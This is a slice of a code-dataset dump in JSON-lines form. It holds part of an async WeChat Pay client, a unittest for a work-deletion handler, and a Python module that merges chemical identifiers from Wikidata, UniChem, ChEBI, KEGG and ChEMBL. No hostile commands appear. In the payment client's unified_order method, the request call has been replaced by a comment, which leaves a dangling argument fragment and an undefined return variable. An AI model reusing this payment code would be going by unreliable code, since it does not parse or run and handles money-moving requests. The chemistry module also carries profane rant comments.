self.mch_id)\n data.setdefault(\"nonce_str\", self.nonce_str)\n data.setdefault(\"sign\", self.sign(data))\n\n if loop is None:\n loop = asyncio.get_event_loop()\n\n connector = aiohttp.TCPConnector(ssl_context=self.ssl_context)\n async with aiohttp.ClientSession(connector=connector, loop=loop) as session:\n async with session.post(url, data=self.to_xml(data).encode(\"utf-8\")) as resp:\n content = await resp.text(encoding='utf-8')\n\n if \"return_code\" in content:\n data = Map(self.to_dict(content))\n if data.return_code == FAIL:\n raise WeixinPayError(data.return_msg)\n if \"result_code\" in content and data.result_code == FAIL:\n raise WeixinPayError(data.err_code_des)\n return data\n return content\n\n def reply(self, msg, ok=True):\n code = SUCCESS if ok else FAIL\n return self.to_xml(dict(return_code=code, return_msg=msg))\n\n async def unified_order(self, loop=None, **data):\n \"\"\"\n Unified order\n out_trade_no, body, total_fee, spbill_create_ip and trade_type are required\n app_id, mchid and nonce_str are filled in automatically\n \"\"\"\n url = \"https://api.mch.weixin.qq.com/pay/unifiedorder\"\n\n # required parameters\n if \"out_trade_no\" not in data:\n raise WeixinPayError(\"unified order interface is missing required parameter out_trade_no\")\n if \"body\" not in data:\n raise WeixinPayError(\"unified order interface is missing required parameter body\")\n if \"total_fee\" not in data:\n raise WeixinPayError(\"unified order interface is missing required parameter total_fee\")\n if \"trade_type\" not in data:\n raise WeixinPayError(\"unified order interface is missing required parameter trade_type\")\n if \"notify_url\" not in data:\n raise WeixinPayError(\"unified order interface is missing required parameter notify_url\")\n\n # conditionally required parameters\n if data[\"trade_type\"] == \"JSAPI\" and \"openid\" not in data:\n raise WeixinPayError(\"openid is required when trade_type is JSAPI\")\n if data[\"trade_type\"] == \"NATIVE\" and \"product_id\" not in data:\n raise WeixinPayError(\"product_id is required when trade_type is NATIVE\")\n\n 
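# appid, mch_id, nonce_str and the signature are filled in by fetch() before the request is sent\n        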
data, loop=loop)\n return raw\n\n async def jsapi(self, loop=None, **kwargs):\n \"\"\"\n Generate the data handed to the JavaScript caller\n See https://pay.weixin.qq.com/wiki/doc/api/jsapi.php?chapter=7_7&index=6 for the detailed rules\n \"\"\"\n kwargs.setdefault(\"trade_type\", \"JSAPI\")\n raw = await self.unified_order(loop=loop, **kwargs)\n package = \"prepay_id={0}\".format(raw[\"prepay_id\"])\n timestamp = str(int(time.time()))\n nonce_str = self.nonce_str\n raw = dict(appId=self.app_id, timeStamp=timestamp,\n nonceStr=nonce_str, package=package, signType=\"MD5\")\n sign = self.sign(raw)\n return dict(package=package, appId=self.app_id, timeStamp=timestamp,\n nonceStr=nonce_str, signType=\"MD5\", paySign=sign)\n\n async def order_query(self, loop=None, **data):\n \"\"\"\n Query an order\n at least one of out_trade_no and transaction_id must be given\n appid, mchid and nonce_str need not be supplied\n \"\"\"\n url = \"https://api.mch.weixin.qq.com/pay/orderquery\"\n\n if \"out_trade_no\" not in data and \"transaction_id\" not in data:\n raise WeixinPayError(\"order query interface: at least one of out_trade_no and transaction_id is required\")\n\n return await self.fetch(url, data, loop=loop)\n\n async def close_order(self, out_trade_no, loop=None, **data):\n \"\"\"\n Close an order\n out_trade_no is required\n appid, mchid and nonce_str need not be supplied\n \"\"\"\n url = \"https://api.mch.weixin.qq.com/pay/closeorder\"\n\n data.setdefault(\"out_trade_no\", out_trade_no)\n\n return await self.fetch(url, data, loop=loop)\n\n async def refund(self, loop=None, **data):\n \"\"\"\n Apply for a refund\n at least one of out_trade_no and transaction_id must be given, and\n out_refund_no, total_fee, refund_fee and op_user_id are required parameters\n appid, mchid and nonce_str need not be supplied\n \"\"\"\n if not self.ssl_context:\n raise WeixinError(\"the refund interface requires a two-way (client) certificate\")\n url = \"https://api.mch.weixin.qq.com/secapi/pay/refund\"\n if \"out_trade_no\" not in data and \"transaction_id\" not in data:\n raise WeixinPayError(\"refund interface: at least one of out_trade_no and transaction_id is required\")\n if \"out_refund_no\" not in data:\n raise WeixinPayError(\"refund interface: missing required parameter out_refund_no\")\n if \"total_fee\" not in data:\n raise WeixinPayError(\"refund interface: missing required parameter total_fee\")\n if \"refund_fee\" not in data:\n raise WeixinPayError(\"refund interface: missing required parameter refund_fee\")\n if \"op_user_id\" not in data:\n raise WeixinPayError(\"refund interface: missing required parameter op_user_id\")\n\n return await self.fetch(url, data, loop=loop)\n\n async def refund_query(self, loop=None, **data):\n \"\"\"\n Query a refund\n After a refund request has been submitted, call this interface to check the refund status. Refunds are delayed:\n refunds to the wallet balance arrive within 20 minutes, refunds to bank cards can take 3 working days, so query the status again later.\n\n one of out_refund_no, out_trade_no, transaction_id and refund_id must be given\n appid, mchid and nonce_str need not be supplied\n \"\"\"\n url = \"https://api.mch.weixin.qq.com/pay/refundquery\"\n if \"out_refund_no\" not in data and \"out_trade_no\" not in data \\\n and \"transaction_id\" not in data and \"refund_id\" not in data:\n raise WeixinPayError(\"refund query interface: one of out_refund_no, out_trade_no, transaction_id and refund_id is required\")\n\n return await self.fetch(url, data, loop=loop)\n\n async def download_bill(self, bill_date, bill_type=\"ALL\", loop=None, **data):\n \"\"\"\n Download the reconciliation bill\n bill_date and bill_type are required parameters\n appid, mchid and nonce_str need not be supplied\n \"\"\"\n url = \"https://api.mch.weixin.qq.com/pay/downloadbill\"\n data.setdefault(\"bill_date\", bill_date)\n data.setdefault(\"bill_type\", bill_type)\n\n if \"bill_date\" not in data:\n raise WeixinPayError(\"bill interface: missing required parameter bill_date\")\n\n return await self.fetch(url, data, loop=loop)\n\n async def transfers(self, check_name=False, loop=None, **data):\n \"\"\"\n Enterprise payment\n Used by a merchant to pay an individual WeChat user,\n currently by paying to a specified user's openid\n\n partner_trade_no, openid, amount, desc and spbill_create_ip are required\n if check_name is true, re_user_name is also required\n appid, mchid and nonce_str need not be supplied\n \"\"\"\n
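 # this endpoint expects mch_appid/mchid rather than appid/mch_id, so the signed fields are set by hand and fetch() is called with setdefault=False below\n url = 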
\"https://api.mch.weixin.qq.com/mmpaymkttransfers/promotion/transfers\"\n\n if \"partner_trade_no\" not in data:\n raise WeixinPayError(\"企业付款接口中,缺少必填参数partner_trade_no\")\n if \"openid\" not in data:\n raise WeixinPayError(\"企业付款接口中,缺少必填参数openid\")\n if \"amount\" not in data:\n raise WeixinPayError(\"企业付款接口中,缺少必填参数amount\")\n if \"desc\" not in data:\n raise WeixinPayError(\"企业付款接口中,缺少必填参数desc\")\n if \"spbill_create_ip\" not in data:\n raise WeixinPayError(\"企业付款接口中,缺少必填参数spbill_create_ip\")\n if check_name is True and \"re_user_name\" not in data:\n raise WeixinPayError(\"企业付款接口中,缺少必填参数re_user_name\")\n\n if check_name is True:\n data[\"check_name\"] = \"FORCE_CHECK\"\n else:\n data[\"check_name\"] = \"NO_CHECK\"\n\n # 微信你坑啊\n data[\"mch_appid\"] = self.app_id\n data[\"mchid\"] = self.mch_id\n data[\"nonce_str\"] = self.nonce_str\n data[\"sign\"] = self.sign(data)\n\n return await self.fetch(url, data, setdefault=False, loop=loop)\n\n async def get_transfer_info(self, partner_trade_no, loop=None):\n \"\"\"\n 查询企业付款\n 用于商户的企业付款操作进行结果查询,返回付款操作详细结果。\n 查询企业付款API只支持查询30天内的订单,30天之前的订单请登录商户平台查询。\n\n partner_trade_no必填\n \"\"\"\n if not self.ssl_context:\n raise WeixinError(\"查询企业付款接口需要双向证书\")\n url = \"https://api.mch.weixin.qq.com/mmpaymkttransfers/gettransferinfo\"\n\n data = dict(partner_trade_no=partner_trade_no)\n\n return await self.fetch(url, data, loop=loop)\n","sub_path":"wxpay.py","file_name":"wxpay.py","file_ext":"py","file_size_in_byte":12254,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"28035713","text":"import json\nimport unittest\nfrom contrib import db, jwt_encode\nfrom delete import handler\n\n\nclass DeleteSuite(unittest.TestCase):\n def setUp(self):\n db.table('work').truncate()\n db.table('workRole').truncate()\n\n def tearDown(self):\n db.table('work').truncate()\n db.table('workRole').truncate()\n\n def test_delete(self):\n user_id = 'user'\n work_id = 'work'\n\n db.table('work').insert({'id': work_id})\n db.table('workRole').insert({\n 'userId': user_id,\n 'workId': work_id,\n 'type': 'author',\n })\n\n work = db.table('work').where('id', work_id).first()\n\n self.assertIsNone(work.get('deletedAt'))\n\n handler({\n 'headers': {\n 'Authorization': jwt_encode(user_id),\n },\n 'pathParameters': {\n 'id': work_id,\n },\n }, None)\n\n work = db.table('work').where('id', work_id).first()\n\n self.assertIsNotNone(work.get('deletedAt'))\n\n def test_delete_by_not_authorized(self):\n user_id = 'user'\n work_id = 'work'\n\n db.table('work').insert({'id': work_id})\n db.table('workRole').insert({\n 'userId': user_id,\n 'workId': work_id,\n 'type': 'author',\n })\n\n work = db.table('work').where('id', work_id).first()\n\n self.assertIsNone(work.get('deletedAt'))\n\n body = json.loads(handler({\n 'pathParameters': {'id': work_id},\n }, None)['body'])\n\n work = db.table('work').where('id', work_id).first()\n\n self.assertEqual(body['error']['code'], 2)\n self.assertEqual(body['error']['message'], 'no permissions')\n self.assertIsNone(work.get('deletedAt'))\n","sub_path":"works/delete_spec.py","file_name":"delete_spec.py","file_ext":"py","file_size_in_byte":1773,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"300412326","text":"from functools import partial\nimport logging\nimport os\nimport pickle\nimport requests\nimport asyncio\nimport gzip\nfrom collections import defaultdict\n\nfrom babel.unichem.unichem import load_unichem\nfrom src.util import LoggingUtil, 
Text\nfrom src.LabeledID import LabeledID\n\nfrom babel.chemical_mesh_unii import refresh_mesh_pubchem\nfrom babel.babel_utils import glom, pull_via_ftp, write_compendium, make_local_name\nfrom babel.chemistry_pulls import pull_chebi, pull_uniprot, pull_iuphar, pull_kegg_sequences, pull_kegg_compounds\nfrom babel.ubergraph import UberGraph\n\nlogger = LoggingUtil.init_logging(\"chemicals\", logging.ERROR, format='medium', logFilePath=f'{os.path.dirname(os.path.abspath(__file__))}/logs/')\n\ndef make_mesh_id(mesh_uri):\n return f\"mesh:{mesh_uri.split('/')[-1][:-1]}\"\n\ndef pull_mesh_chebi():\n url = 'https://query.wikidata.org/sparql?format=json&query=SELECT ?chebi ?mesh WHERE { ?compound wdt:P683 ?chebi . ?compound wdt:P486 ?mesh. }'\n results = requests.get(url).json()\n pairs = [(f'MESH:{r[\"mesh\"][\"value\"]}', f'CHEBI:{r[\"chebi\"][\"value\"]}')\n for r in results['results']['bindings']\n if not r['mesh']['value'].startswith('M')]\n #Wikidata is great, except when it sucks. One thing it likes to do is to\n # have multiple CHEBIs for a concept, say ignoring stereochemistry or \n # the like. No good. It's easy enough to filter these out, but then \n # we wouldn't have the mesh associated with anything. A spot check makes it seem like\n # cases of this type usually also have a UNII. So we can perhaps remove ugly pairs without\n # a problem.\n m2c = defaultdict(list)\n for m,c in pairs:\n m2c[m].append(c)\n fpairs = []\n for m,clist in m2c.items():\n if len(clist) == 1:\n fpairs.append( (m,clist[0]) )\n mcname = make_local_name('mesh_chebi.txt')\n with open(mcname, 'w') as outf:\n for m, c in fpairs:\n outf.write(f'{m}\\t{c}\\n')\n return fpairs\n\ndef pull_uniprot_chebi():\n url = 'https://query.wikidata.org/sparql?format=json&query=SELECT DISTINCT ?c ?s WHERE { ?compound wdt:P683 ?c. ?compound p:P352 ?statement . ?statement pq:P2888 ?s. }'\n results = requests.get(url).json()\n pairs = [ (f'UniProtKB:{r[\"s\"][\"value\"].split(\"/\")[-1]}',f'CHEBI:{r[\"c\"][\"value\"]}')\n for r in results['results']['bindings'] ]\n #with open('uniprot_chebi.txt','w') as outf:\n # for m,c in pairs:\n # outf.write(f'{m}\\t{c}\\n')\n return pairs\n\ndef filter_mesh_chebi(mesh_chebi,concord):\n \"\"\"MESH/CHEBI is a real mess though. wikidata has no principled way to connect identifiers. It's just whatever\n somebody said. We really should use it as a last resort. If we don't know much about it, then sure. But if\n we've already got a chebi or a unii, then we should ignore this wiki stuff.\"\"\"\n fmc = []\n for m,c in mesh_chebi:\n if m not in concord:\n fmc.append( (m,c) )\n else:\n equivs = concord[m]\n prefs = [ Text.get_curie(e) for e in equivs ]\n if 'CHEBI' in prefs:\n continue\n if 'UNII' in prefs:\n continue\n if 'INCHIKEY' in prefs:\n continue\n fmc.append( (m,c) )\n return fmc\n\n##\n# Here's a pointless rant about chemical synonymization.\n#\n# IT SHOULD BE EASY\n#\n# Chemicals are defined structures! Inchikeys! SMILES! It isn't rocket science!\n# If it has the same structure, it's the same! If it doesn't, it isn't!\n# \n# Here's the problem - some vocabularies use chemicals, but not based on\n# structures. These are usually bullshit vocabularies like MeSH (It's, like,\n# just a concept, dude) that occasionally just assert that they're the same\n# as something that does have a structure, like a UNII. 
On the whole if \n# one of these ding-dong vocabularies gives us that information, we should\n# use it because it's the only objective statement about the identity of the\n# term that will ever exist.\n#\n# Anybody who asserts that things with different structures are the same should\n# be brought up on charges at the Hague. I'm looking at you, wikidata, and your\n# willingness to identify e.g. hydrous and anhydrous CHEBIs in the same entry\n#\n# Also, it would be great if UNII could figure out how to assign inchis\n# correctly. Both Stibine (antimony with hydrogen atoms) and Antimony \n# (elemental) end up with the same inchikey erroneously, which causes all\n# sorts of downstream problems, because other stuff links to them separately\n# and sort of correctly if you don't pay attention to the keys and just to the \n# name, which apparently is what people do even in our advanced civilization.\n# And we can't ignore UNII completely because that's one of the links that MeSH uses.\n#\n##\n\n###\n#\n# Chemical synonymization includes both small molecules and large molecules (peptides and proteins)\n# In many cases these don't intersect, but in some they do, and we need to handle that\n#\n# Chemicals can be described 4 ways:\n# 1. InchiKey - the most specific. For chemicals with ik's, UniChem has a concordance.\n# 2. SMILES - everything with an IK has a smiles, but not vice versa: can handle things like R-groups\n# 3. AA sequence - Peptides e.g. can be described with a smiles, but AA sequence is more succinct. Sometimes\n# this can get ugly, because something might be made up of 2 sequences hooked together.\n# 4. Nothing - We can have a name for something without any information about the structure.\n#\n# Each source can contain a mix. So e.g. chebi contains some with inchi, some with smiles, and some with nothing\n#\n# Synonymization process:\n# 1. Handle all the stuff that has an InchiKey using unichem\n# 2. Mesh is all \"no structure\". We try to use a variety of sources to hook mesh id's to anything else\n# 3. Pull from chebi the sdf and db files, use them to link to things (KEGG) in the no inchi/no smiles cases\n# 4. Go to KEGG, and get sequences for peptides.\n# 5. Pull UniProt (swissprot) XML. Calculate sequences for the sub-sequences (Uniprot_PRO)\n# 6. Use the sequences to merge UniProt_PRO with KEGG.\n# 7. Read IUPHAR, discard things with INCHI, use things with sequence to match UniProt_PRO/KEGG\n# Use the hand-curated version of IUPHAR to match the un-sequenced stuff left over\n# 8. Use wikidata to get links between CHEBI and UniProt_PRO\n# 9. glom across sequence and chemical stuff\n# 10. Drop PRO only sequences.\n#\n# It would be good to completely redo this so that it was make-like.\ndef load_chemicals(refresh_mesh=False,refresh_uniprot=False,refresh_pubchem=False,refresh_chembl=False):\n #Keep labels separate\n labels = {}\n # DO MESH/CHEBI, but don't combine any chebi's into a set with it\n print('MESH/CHEBI')\n mesh_chebi = pull_mesh_chebi()\n # Build if need be\n if refresh_mesh:\n refresh_mesh_pubchem()\n #Get all the simple stuff\n # 1. Handle all the stuff that has an InchiKey using unichem\n # 2. Mesh is all \"no structure\". We try to use a variety of sources to hook mesh id's to anything else\n print('UNICHEM')\n #refresh\n concord = load_unichem(refresh=True)\n #don't refresh\n #concord = load_unichem()\n
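 # concord maps each curie to its current equivalence set; e.g. concord['CHEBI:15377'] could include 'INCHIKEY:XLYOFNOQVPJJNP-UHFFFAOYSA-N' (illustrative values, not pulled from the data)\n # 2. Mesh is all \"no structure\". 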
We try to use a variety of sources to hook mesh id's to anything else\n #DO MESH/UNII\n print('MESH/UNII')\n mesh_unii_file = make_local_name( 'mesh_to_unii.txt')\n mesh_unii_pairs = load_pairs(mesh_unii_file, 'UNII')\n glom(concord, mesh_unii_pairs,pref='MESH')\n print('write-mesh-unii was fine')\n check_multiple_ids(concord)\n # DO MESH/PUBCHEM\n print('MESH/PUBCHEM')\n mesh_pc_file = make_local_name('mesh_to_pubchem.txt')\n mesh_pc_pairs = load_pairs(mesh_pc_file, 'PUBCHEM.COMPOUND')\n glom(concord, mesh_pc_pairs,pref='MESH')\n print('write-mesh-pubchem')\n check_multiple_ids(concord)\n # DO MESH/CHEBI, but don't combine any chebi's into a set with it\n #print('MESH/CHEBI')\n #mesh_chebi = pull_mesh_chebi()\n #Merging CHEBIS can be ok because of primary/secondary chebis. Really we \n # don't want to merge INCHIs\n #MESH/CHEBI is a real mess though. wikidata has no principled way to connect identifiers. It's just whatever\n # somebody said. We really should use as a last resort. If we don't know much about it, then sure. But if\n # we've already got a chebi or a unii, then we should ignore this wiki stuff.\n mesh_chebi_filter = filter_mesh_chebi(mesh_chebi,concord)\n print(f\"Started with {len(mesh_chebi)} m/c pairs\")\n print(f\"filtered to {len(mesh_chebi_filter)} m/c pairs\")\n glom(concord, mesh_chebi_filter,pref='MESH')\n print('write-mesh-chebi')\n check_multiple_ids(concord)\n #Now pull all the chemical meshes.\n cmesh = []\n with open( make_local_name('chemical_mesh.txt'),'r') as inf:\n for line in inf:\n s = line.strip().split('\\t')\n meshid = f'MESH:{s[0]}'\n label = s[1]\n cmesh.append ( (meshid,) )\n labels[meshid] = label\n glom(concord, cmesh)\n #print('write-mesh')\n #this one is ok 3/8/2020\n #write_compendium(set([ frozenset(x) for x in concord.values() ]),'chemconc_mesh.txt','chemical_substance',labels=labels)\n check_multiple_ids(concord)\n # 3. Pull from chebi the sdf and db files, use them to link to things (KEGG) in the no inchi/no smiles cases\n print('chebi')\n pubchem_chebi_pairs, kegg_chebi_pairs, chebi_unmapped = pull_chebi()\n all_chebis,chebi_labels = get_all_chebis()\n labels.update(chebi_labels)\n glom(concord, pubchem_chebi_pairs,pref= 'CHEBI')\n glom(concord, kegg_chebi_pairs,pref='CHEBI')\n glom(concord, chebi_unmapped, pref='CHEBI')\n glom(concord, all_chebis, pref = 'CHEBI')\n print('write-chebi')\n #good march 8#\n #write_compendium(set([ frozenset(x) for x in concord.values() ]),'chemconc_chebi.txt','chemical_substance',labels=labels)\n #exit()\n check_multiple_ids(concord)\n # 3a. pull in all KEGG labels and compounds. This is mostly to pick up keggs that don't map to anything else\n print('kegg')\n kname = make_local_name('kegg.pickle')\n #to refresh kegg:\n keggs,kegg_labels = pull_kegg_compounds()\n with open(kname,'wb') as kf:\n pickle.dump((keggs,kegg_labels),kf)\n # To use old KEGG\n #with open(kname,'rb') as inf:\n # keggs,kegg_labels = pickle.load(inf)\n fkeggs = [ (k,) for k in keggs ]\n keggs = fkeggs\n glom(concord,keggs,pref='KEGG')\n labels.update(kegg_labels)\n #OK TO HERE\n check_multiple_ids(concord)\n #write_compendium(set([ frozenset(x) for x in concord.values() ]),'chemconc_kegg.txt','chemical_substance',labels=labels)\n # 4. Go to KEGG, and get sequences for peptides.\n sequence_concord = pull_kegg_sequences()\n # 5. Pull UniProt (swissprot) XML.\n # Calculate sequences for the sub-sequences (Uniprot_PRO)\n print('uniprot')\n sequence_to_uniprot = pull_uniprot(refresh_uniprot)\n # 6. 
Use the sequences to merge UniProt with KEGG\n for s,v in sequence_to_uniprot.items():\n sequence_concord[s].update(v)\n # 7. Read IUPHAR, discard things with INCHI, use things with sequence to match UniProt_PRO/KEGG\n # Use the hand-curated version of IUPHAR to match the un-sequenced stuff left over\n print('iuphar')\n sequence_to_iuphar, iuphar_glom = pull_iuphar()\n for s,v in sequence_to_iuphar.items():\n sequence_concord[s].update(v)\n glom(concord,iuphar_glom,pref='gtpo')\n #write_compendium(set([ frozenset(x) for x in concord.values() ]),'chemconc_iuphar.txt','chemical_substance',labels=labels)\n check_multiple_ids(concord)\n # 8. Use wikidata to get links between CHEBI and UniProt_PRO\n #These 2 lines are if we want back uniprots\n #unichebi = pull_uniprot_chebi() \n #glom(concord, unichebi)\n #write_compendium(set([ frozenset(x) for x in concord.values() ]),'chemconc_unicheb.txt','chemical_substance',labels=labels)\n check_multiple_ids(concord)\n # 9. glom across sequence and chemical stuff\n new_groups = sequence_concord.values()\n glom(concord,new_groups,unique_prefixes=['gtpo','INCHI'])\n #write_compendium(set([ frozenset(x) for x in concord.values() ]),'chemconc_newgroups.txt','chemical_substance',labels=labels)\n check_multiple_ids(concord)\n # 10. Drop PRO only sequences.\n # Something odd going on, remove for now.\n #for eq_id_set in concord:\n # if len(eq_id_set) > 1:\n # continue\n # print(eq_id_set)\n # item = iter(eq_id_set).next()\n # if '#PRO_' in item:\n # to_remove.add(eq_id_set)\n #for eids in to_remove:\n # concord.remove(eids)\n #And we're back\n #Add labels to CHEBIs, CHEMBLs, MESHes\n print('LABEL')\n #label_chebis(concord)\n labels.update(label_chembls(concord, refresh_chembl = refresh_chembl ))\n #label_meshes(concord)\n# label_pubchem(concord, refresh_pubchem = refresh_pubchem)\n print('dumping')\n #Dump\n #tout = set([frozenset(x) for x in concord.values()][:10000])\n #write_compendium(tout,'chemconc.txt','chemical_substance',labels=labels)\n #exit()\n write_compendium(set([ frozenset(x) for x in concord.values() ]),'chemconc.txt','chemical_substance',labels=labels)\n print('done')\n\ndef check_multiple_ids(g):\n used = set()\n olks = {}\n for k in g.keys():\n if isinstance(k,LabeledID):\n kid = k.identifier \n else:\n kid = k\n if kid in used:\n print('ugh')\n print(kid,k)\n print(g[k])\n print(g[olks[kid]])\n exit()\n olks[kid] = k\n used.add(kid)\n\ndef get_chebi_label(ident):\n res = requests.get(f'https://uberonto.renci.org/label/{ident}/').json()\n return res['label']\n\ndef get_chembl_label(ident):\n res = requests.get(f'https://www.ebi.ac.uk/chembl/api/data/molecule/{Text.un_curie(ident)}.json').json()\n return res['pref_name']\n\ndef get_dict_label(ident, labels):\n try:\n return labels[ident]\n except KeyError:\n return None\n\ndef get_mesh_label(ident, labels):\n try:\n return labels[Text.un_curie(ident)]\n except KeyError:\n return \"\"\n\n###\n\ndef get_all_chebis():\n print('READ CHEBI')\n iri = 'CHEBI:24431'\n uber = UberGraph()\n chebis = []\n chebi_labels = {}\n uberres = uber.get_subclasses_of(iri)\n for c in uberres:\n chebis.append( (c['descendent'],) )\n chebi_labels[ c['descendent'] ] = c['descendentLabel']\n return chebis, chebi_labels\n\n\ndef get_all_chebis_obo():\n print('READ CHEBI')\n chebiobo = pull_via_ftp('ftp.ebi.ac.uk', '/pub/databases/chebi/ontology', 'chebi_lite.obo')\n lines = chebiobo.split('\\n')\n chebis = []\n chebi_labels = {}\n for line in lines:\n if line.startswith('[Term]'):\n tid = None\n label = None\n elif 
line.startswith('id:'):\n tid = line[3:].strip()\n elif line.startswith('name:'):\n label = line[5:].strip()\n #There's some stuff in here like \"has_part, has part\"\n if tid.startswith('CHEBI:'):\n #lid = LabeledID(identifier=tid, label=label)\n chebis.append( (tid, ) )\n chebi_labels[tid] = label\n return chebis, chebi_labels\n #print('LABEL CHEBI')\n #label_compounds(concord, 'CHEBI', partial(get_dict_label, labels=chebi_labels))\n # label_compounds(concord,'CHEBI',get_chebi_label)\n\n\ndef process_chunk(lines, label_dict):\n if len(lines) == 0:\n return\n if not lines[0].startswith('chembl_molecule'):\n return\n chemblid = f\"CHEMBL.COMPOUND:{lines[0].split()[0].split(':')[1]}\"\n label = None\n for line in lines[1:]:\n s = line.strip()\n if s.startswith('rdfs:label'):\n label = s.split()[1]\n if label.startswith('\"'):\n label = label[1:]\n if label.endswith('\"'):\n label = label[:-1]\n if label is not None:\n label_dict[chemblid] = label\n\n\ndef label_chembls(concord, refresh_chembl = False):\n print('READ CHEMBL')\n fname = 'chembl_25.0_molecule.ttl.gz'\n localfile = make_local_name(fname[:-3])\n # uncomment if you need a new one\n if refresh_chembl:\n data=pull_via_ftp('ftp.ebi.ac.uk', '/pub/databases/chembl/ChEMBL-RDF/25.0/',fname,decompress_data=True,outfilename=fname[:-3])\n chembl_labels = {}\n chunk = []\n with open(localfile, 'r') as inf:\n for line in inf:\n l = line.strip()\n if len(l) == 0:\n process_chunk(chunk, chembl_labels)\n chunk = []\n elif l.startswith('@'):\n pass\n else:\n chunk.append(l)\n return chembl_labels\n #print('LABEL CHEMBL', len(chembl_labels))\n #label_compounds(concord, 'CHEMBL.COMPOUND', partial(get_dict_label, labels=chembl_labels))\n # label_compounds(concord,'CHEMBL',get_chembl_label)\n\n\ndef label_meshes(concord):\n print('LABEL MESH')\n #labelname = os.path.join(os.path.dirname(__file__), 'meshlabels.pickle')\n labelname = make_local_name('meshlabels.pickle')\n with open(labelname, 'rb') as inf:\n mesh_labels = pickle.load(inf)\n label_compounds(concord, 'MESH', partial(get_mesh_label, labels=mesh_labels))\n\ndef label_pubchem(concord, refresh_pubchem = False):\n print('LABEL PUBCHEM')\n f_name = 'CID-IUPAC.gz'\n if refresh_pubchem:\n outfname = pull_via_ftp('ftp.ncbi.nlm.nih.gov','/pubchem/Compound/Extras/', f_name, outfilename=f_name)\n else:\n outfname = make_local_name(f_name)\n labels = {}\n with gzip.open(outfname, 'rt') as in_file:\n for line in in_file:\n # since the synonyms are weighted already will just pick the first one.\n l = line.strip()\n cid, label = l.split('\\t')\n if f'PUBCHEM.COMPOUND:{cid}' in labels:\n continue\n labels[f'PUBCHEM.COMPOUND:{cid}'] = label\n label_compounds(concord, 'PUBCHEM.COMPOUND', partial(get_dict_label, labels= labels))\n\n\n###\n\ndef label_compounds(concord, prefix, get_label):\n foundlabels = {}\n for k, v in concord.items():\n to_remove = []\n to_add = []\n for ident in v:\n if Text.get_curie(ident) == prefix:\n if not ident in foundlabels:\n label = get_label(ident)\n if label is not None:\n #lid = LabeledID(ident, get_label(ident))\n foundlabels[ident] = label\n #else:\n # foundlabels[ident] = None\n if ident in foundlabels:\n label = foundlabels[ident]\n if label is not None:\n to_remove.append(ident)\n to_add.append(foundlabels[ident])\n for r in to_remove:\n v.remove(r)\n for r in to_add:\n v.add(r)\n\n\ndef remove_ticks(s):\n if s.startswith(\"'\"):\n s = s[1:]\n if s.endswith(\"'\"):\n s = s[:-1]\n return s\n\n\ndef load_pairs(fname, prefix):\n pairs = []\n with open(fname, 'r') as 
inf:\n for line in inf:\n x = line.strip().split('\\t')\n mesh = f\"MESH:{x[0]}\"\n if x[1].startswith('['):\n pre_ids = x[1][1:-1].split(',')\n pre_ids = [remove_ticks(pids.strip()) for pids in pre_ids] # remove spaces and ' marks around ids\n else:\n pre_ids = [x[1]]\n ids = [f'{prefix}:{pid}' for pid in pre_ids]\n for identifier in ids:\n pairs.append((mesh, identifier))\n return pairs\n\n\ndef uni_glom(unichem_data, prefix1, prefix2, chemdict):\n print(f'{prefix1}/{prefix2}')\n n = unichem_data.split('\\n')[1:]\n if len(n[-1]) == 0:\n n = n[:-1]\n pairs = [ni.split('\\t') for ni in n]\n for p in pairs:\n if p[0].startswith(\"'\") or p[1].startswith(\"'\"):\n print(f'UNI_GLOM {prefix1} {prefix2} {p}')\n curiepairs = [(f'{prefix1}:{p[0]}', f'{prefix2}:{p[1]}') for p in pairs]\n glom(chemdict, curiepairs)\n\n\n\n\n#########################\n# load_unichem() - Loads a dict object with targeted chemical substance curies for synonymization\n#\n# TODO: get the column header from the readme. Unfortunately that means that we need the readme not to change...\n#\n# The XREF file format from unichem\n# ftp.ebi.ac.uk/pub/databases/chembl/UniChem/data/oracleDumps/UDRI/UC_XREF.txt.gz\n# September 2019:\n# cols: uci src_id src_compound_id assignment last_release_u_when_current created lastupdated userstamp aux_src\n# December 2019:\n# cols: uci_old , src_id , src_compound_id , assignment , last_release_u_when_current , created , lastupdated , userstamp , aux_src , uci\n#\n# The STRUCTURE file format from unichem\n# ftp.ebi.ac.uk/pub/databases/chembl/UniChem/data/oracleDumps/UDRI/UC_STRUCTURE.txt.gz\n# September 2019:\n# cols: uci standardinchi standardinchikey created username fikhb\n# December 2019:\n# cols: uci_old , standardinchi , standardinchikey , created , username , fikhb , uci , parent_smiles\n#\n# working_dir: str - the working directory for the downloaded files\n# xref_file: str - optional location of already downloaded and decompressed unichem XREF file\n# struct_file: str - optional location of already downloaded and decompressed unichem STRUCTURE file\n# return: dict - The cross referenced curies ready for inserting into the redis cache\n#########################\n\n#########################\n# get_latest_unichem_url() - gets the latest UniChem data directory url\n#\n# return: str - the unichem FTP URL\n#########################\n\nasync def make_uberon_role_queries(chebi_ids, chemical_annotator):\n tasks = []\n for id in chebi_ids:\n tasks.append(chemical_annotator.get_chemical_roles(id))\n results = await asyncio.gather(*tasks)\n\n reformatted_result = {}\n for result in results:\n for chebi_id in result:\n reformatted_result[chebi_id] = list(map(lambda x: x['role_label'], result[chebi_id]))\n return reformatted_result\n\n\ndef merge_roles_and_annotations(chebi_role_data, chebi_annotation_data):\n \"\"\"\n Merges roles into the bigger annotation dict as roles key.\n \"\"\"\n for chebi_id in chebi_role_data:\n for key in chebi_role_data[chebi_id]:\n chebi_annotation_data[chebi_id][key] = True\n yield (chebi_id, chebi_annotation_data[chebi_id])\n\n\n#def annotate_from_chebi(rosetta):\n# chebisdf = pull_and_decompress('ftp.ebi.ac.uk', '/pub/databases/chebi/SDF/', 'ChEBI_complete_3star.sdf.gz')\n# chunk = []\n# logger.debug('caching chebi annotations')\n# # grab a bunch of them to make use of concurrent execution for fetching roles from Uberon\n# result_buffer = {}\n# num_request_per_round = 500\n# loop = asyncio.new_event_loop()\n# chemical_annotator = ChemicalAnnotator(rosetta)\n# 
